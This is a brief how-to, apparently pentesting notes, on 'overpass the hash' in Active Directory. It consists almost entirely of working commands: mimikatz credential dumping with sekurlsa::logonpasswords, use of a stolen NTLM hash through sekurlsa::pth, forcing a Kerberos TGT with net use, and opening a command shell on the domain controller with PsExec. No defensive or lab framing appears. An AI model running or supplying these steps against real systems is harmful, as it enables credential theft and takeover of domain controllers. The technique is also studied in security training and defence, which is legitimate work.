Overpass the hash

With overpass the hash, we can “over” abuse a NTLM user hash to gain a full Kerberos Ticket
Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as
that user.

1) Transfer all 3 mimikatz file to run mimikatz.exe

mimikatz.exe

2) Give privilege access

privilege::debug

3) sekurlsa::logonpasswords

Skip this step, if you already have hash

4) sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe

At this point, we have a new PowerShell session that allows us to execute commands as
<user>.

5) exit mimikatz

6) klist

No Kerberos tickets have been cached, but this is expected since <user> has not performed
an interactive login.

7) net use \\<dc_machine_name>

However, let’s generate a TGT by authenticating to a network share on the domain controller or another service with net use:

8) klist

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that
rely on Kerberos authentication (as opposed to NTLM) such as the official PsExec application
from Microsoft

9) .\PsExec.exe \\<dc_machine_name> cmd.exe

10) ipconfig to check

successfully reused the Kerberos TGT to launch a command shell on the domain controller.